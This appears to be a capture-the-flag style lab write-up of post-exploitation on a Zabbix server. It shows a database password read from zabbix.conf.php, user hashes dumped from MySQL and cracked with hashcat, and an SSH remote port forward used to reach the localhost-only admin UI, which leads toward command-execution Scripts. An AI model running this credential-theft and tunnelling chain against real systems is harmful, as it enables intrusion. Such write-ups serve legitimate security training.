Zabbix
Evaluating the target Zabbix instance after making a manual system enumeration
Configuration
www-data@zab:/usr/share/zabbix/ui/conf$ cat /etc/apache2/conf-enabled/zabbix.conf
# Define /zabbix alias, this is the default
<IfModule mod_alias.c>
Alias /zabbix /usr/share/zabbix/ui
</IfModule>
<Directory "/usr/share/zabbix/ui">
Options FollowSymLinks
AllowOverride None
Order allow,deny
Allow from all
<IfModule mod_php.c>
php_value max_execution_time 300
php_value memory_limit 128M
php_value post_max_size 16M
php_value upload_max_filesize 2M
php_value max_input_time 300
php_value max_input_vars 10000
php_value always_populate_raw_post_data -1
</IfModule>
<IfModule mod_php7.c>
php_value max_execution_time 300
php_value memory_limit 128M
php_value post_max_size 16M
php_value upload_max_filesize 2M
php_value max_input_time 300
php_value max_input_vars 10000
php_value always_populate_raw_post_data -1
</IfModule>
</Directory>
<Directory "/usr/share/zabbix/ui/conf">
Order deny,allow
Deny from all
<files *.php>
Order deny,allow
Deny from all
</files>
</Directory>
<Directory "/usr/share/zabbix/ui/app">
Order deny,allow
Deny from all
<files *.php>
Order deny,allow
Deny from all
</files>
</Directory>
<Directory "/usr/share/zabbix/ui/include">
Order deny,allow
Deny from all
<files *.php>
Order deny,allow
Deny from all
</files>
</Directory>
<Directory "/usr/share/zabbix/ui/local">
Order deny,allow
Deny from all
<files *.php>
Order deny,allow
Deny from all
</files>
</Directory>
<Directory "/usr/share/zabbix/ui/vendor">
Order deny,allow
Deny from all
<files *.php>
Order deny,allow
Deny from all
</files>
</Directory>Checking the Apache configuration reveals that the web directory, /zabbix/ is mapped to the application root directory at /usr/share/zabbix/ui
www-data@zab:/usr/share/zabbix/ui/conf$ cat zabbix.conf.php
<?php
// Zabbix GUI configuration file.
$DB['TYPE'] = 'MYSQL';
$DB['SERVER'] = 'localhost';
$DB['PORT'] = '0';
$DB['DATABASE'] = 'zabbix';
$DB['USER'] = 'zabbix';
$DB['PASSWORD'] = 'breadandbuttereater121';
// Schema name. Used for PostgreSQL.
$DB['SCHEMA'] = '';
// Used for TLS connection.
$DB['ENCRYPTION'] = false;
$DB['KEY_FILE'] = '';
$DB['CERT_FILE'] = '';
$DB['CA_FILE'] = '';
$DB['VERIFY_HOST'] = false;
$DB['CIPHER_LIST'] = '';
// Vault configuration. Used if database credentials are stored in Vault secrets manager.
$DB['VAULT'] = '';
$DB['VAULT_URL'] = '';
$DB['VAULT_PREFIX'] = '';
$DB['VAULT_DB_PATH'] = '';
$DB['VAULT_TOKEN'] = '';
$DB['VAULT_CERT_FILE'] = '';
$DB['VAULT_KEY_FILE'] = '';
$ZBX_SERVER_NAME = 'zabbix server';
$IMAGE_FORMAT_DEFAULT = IMAGE_FORMAT_PNG;The ui/conf/zabbix.conf.php file contains the DB credential; zabbix:breadandbuttereater121
MySQL
www-data@zab:/usr/share/zabbix/ui/conf$ mysql -uzmysql -uzabbix -pbreadandbuttereater121
mysql -uzabbix -pbreadandbuttereater121
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 49
Server version: 8.0.41-0ubuntu0.22.04.1 (Ubuntu)
Copyright (c) 2000, 2025, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> Session established
mysql> use zabbix;
use zabbix;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> SELECT username,passwd FROM users;
SELECT username,passwd FROM users;
+----------+--------------------------------------------------------------+
| username | passwd |
+----------+--------------------------------------------------------------+
| Admin | $2y$10$KA6iPN5sY5.Z4KLerN7XOOO1P7jR8MD2e0SqNRXOsJjV1b.8c5Si. |
| guest | $2y$10$89otZrRNmde97rIyzclecuk6LwKAsHN0BcvoOKGjbT.BwMBfm7G06 |
+----------+--------------------------------------------------------------+
2 rows in set (0.00 sec)Exfiltrating the credentials
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zab]
└─$ hashcat -a 0 -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$2y$10$89otZrRNmde97rIyzclecuk6LwKAsHN0BcvoOKGjbT.BwMBfm7G06:
$2y$10$KA6iPN5sY5.Z4KLerN7XOOO1P7jR8MD2e0SqNRXOsJjV1b.8c5Si.:dinosaur
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: .\hashes.txt
Time.Started.....: Thu Apr 17 17:17:48 2025 (9 secs)
Time.Estimated...: Thu Apr 17 17:17:57 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1100 H/s (9.61ms) @ Accel:1 Loops:16 Thr:24 Vec:1
Speed.#3.........: 38 H/s (11.58ms) @ Accel:1 Loops:1 Thr:16 Vec:1
Speed.#*.........: 1138 H/s
Recovered........: 2/2 (100.00%) Digests (total), 2/2 (100.00%) Digests (new), 2/2 (100.00%) Salts
Progress.........: 10800/28688770 (0.04%)
Rejected.........: 0/10800 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1008-1024
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:696-697
Candidate.Engine.: Device Generator
Candidates.#1....: munchie -> crazy8
Candidates.#3....: 123456 -> letmein
Hardware.Mon.#1..: Temp: 63c Util: 98% Core:1792MHz Mem:6001MHz Bus:8
Hardware.Mon.#3..: N/A
Started: Thu Apr 17 17:17:26 2025
Stopped: Thu Apr 17 17:17:59 2025The Guest account has an empty password
The Admin user has dinosaur as password
Internal
Initially, the target Zabbix instance showed that it’s under maintenance. But that’s likely due to its security mechanism to limit the access to the localhost address
www-data@zab:/$ curl http://localhost/zabbix/
<!DOCTYPE html><html lang="en" theme="blue-theme" color-scheme="light"> <head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge"/>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="Author" content="Zabbix SIA" /><title>zabbix server: Zabbix</title> <link rel="icon" href="favicon.ico">
<link rel="apple-touch-icon-precomposed" sizes="76x76" href="assets/img/apple-touch-icon-76x76-precomposed.png">
<link rel="apple-touch-icon-precomposed" sizes="120x120" href="assets/img/apple-touch-icon-120x120-precomposed.png">
<link rel="apple-touch-icon-precomposed" sizes="152x152" href="assets/img/apple-touch-icon-152x152-precomposed.png">
<link rel="apple-touch-icon-precomposed" sizes="180x180" href="assets/img/apple-touch-icon-180x180-precomposed.png">
<link rel="icon" sizes="192x192" href="assets/img/touch-icon-192x192.png">
<meta name="msapplication-TileImage" content="assets/img/ms-tile-144x144.png">
<meta name="msapplication-TileColor" content="#d40000">
<meta name="msapplication-config" content="none"/><link rel="stylesheet" type="text/css" href="assets/styles/blue-theme.css?1740466436"><style>:root {
--severity-color-na-bg: #97AAB3;
--severity-color-info-bg: #7499FF;
--severity-color-warning-bg: #FFC859;
--severity-color-average-bg: #FFA059;
--severity-color-high-bg: #E97659;
--severity-color-disaster-bg: #E45959;
}
.na-bg, .na-bg input[type="radio"]:checked + label, .na-bg:before, .flh-na-bg, .status-na-bg, .status-na-bg:before { background-color: #97AAB3 }
.info-bg, .info-bg input[type="radio"]:checked + label, .info-bg:before, .flh-info-bg, .status-info-bg, .status-info-bg:before { background-color: #7499FF }
.warning-bg, .warning-bg input[type="radio"]:checked + label, .warning-bg:before, .flh-warning-bg, .status-warning-bg, .status-warning-bg:before { background-color: #FFC859 }
.average-bg, .average-bg input[type="radio"]:checked + label, .average-bg:before, .flh-average-bg, .status-average-bg, .status-average-bg:before { background-color: #FFA059 }
.high-bg, .high-bg input[type="radio"]:checked + label, .high-bg:before, .flh-high-bg, .status-high-bg, .status-high-bg:before { background-color: #E97659 }
.disaster-bg, .disaster-bg input[type="radio"]:checked + label, .disaster-bg:before, .flh-disaster-bg, .status-disaster-bg, .status-disaster-bg:before { background-color: #E45959 }
</style><script>
const PHP_ZBX_FULL_DATE_TIME = "Y-m-d h:i:s A";
const PHP_TZ_OFFSETS = [0];
</script><script src="js/browsers.js?1740466437"></script></head>
<body><div class="wrapper"><main><div class="server-name">zabbix server</div><div class="signin-container"><div class="signin-logo"><div class="zabbix-logo"></div></div><form method="post" action="index.php" accept-charset="utf-8" aria-label="Sign in"><ul><li><label for="name">Username</label><input type="text" id="name" name="name" value="" maxlength="255" autofocus="autofocus"></li><li><label for="password">Password</label><input type="password" id="password" name="password" value="" maxlength="255" autocomplete="off"></li><li><input type="checkbox" id="autologin" name="autologin" value="1" class="checkbox-radio" checked="checked"><label for="autologin"><span></span>Remember me for 30 days</label></li><li><button type="submit" id="enter" name="enter" value="Sign in">Sign in</button></li></ul></form></div><div class="signin-links"><a target="_blank" rel="noopener noreferrer" class="grey link-alt" href="https://www.zabbix.com/documentation/7.2/">Help</a> • <a target="_blank" rel="noopener noreferrer" class="grey link-alt" href="https://www.zabbix.com/support">Support</a></div></main><footer role="contentinfo">© 2001–2025, <a class="grey link-alt" target="_blank" rel="noopener noreferrer" href="https://www.zabbix.com/">Zabbix SIA</a></footer></div></body>/Practice/Zab/4-Post_Enumeration/attachments/{B97A07D5-75C0-44AE-8164-D8E6ACAF64A9}.png)
As shown above, it was limiting access to the localhost address
Tunneling
In order to access the target Zabbix instance, I would need to tunnel it.
Since the current user, www-data, cannot have SSH, i will conduct a SSH remote portforwarding
www-data@zab:/$ ssh -fssh -f -N -R 127.0.0.1:8888:localhost:80 kali@192.168.45.155
kali@192.168.45.155's password: kaliSSH tunnel established
Listening on port 8888 on Kali machine (127.0.0.1:8888) and forward all traffic to the target system’s localhost:80
Authentication
/Practice/Zab/4-Post_Enumeration/attachments/{73F472C8-5A53-486F-AA5A-DC41EB0C4659}.png)
/Practice/Zab/4-Post_Enumeration/attachments/{6CE82F09-840E-4A78-A69C-4311A5E25824}.png)
Authentication successful with the cracked password of the Admin user
Version Information
/Practice/Zab/4-Post_Enumeration/attachments/Pasted-image-20250417173810.png)
The version information is disclosed; 7.2.4
Scripts
Zabbix features the scripts functionality to execute OS command to registered hosts
/Practice/Zab/4-Post_Enumeration/attachments/{871B35B9-EAC0-4536-9527-9E956328D969}.png)
Looking further into the application, the Scripts feature is available under the Alerts section
Moving onto the Lateral Movement phase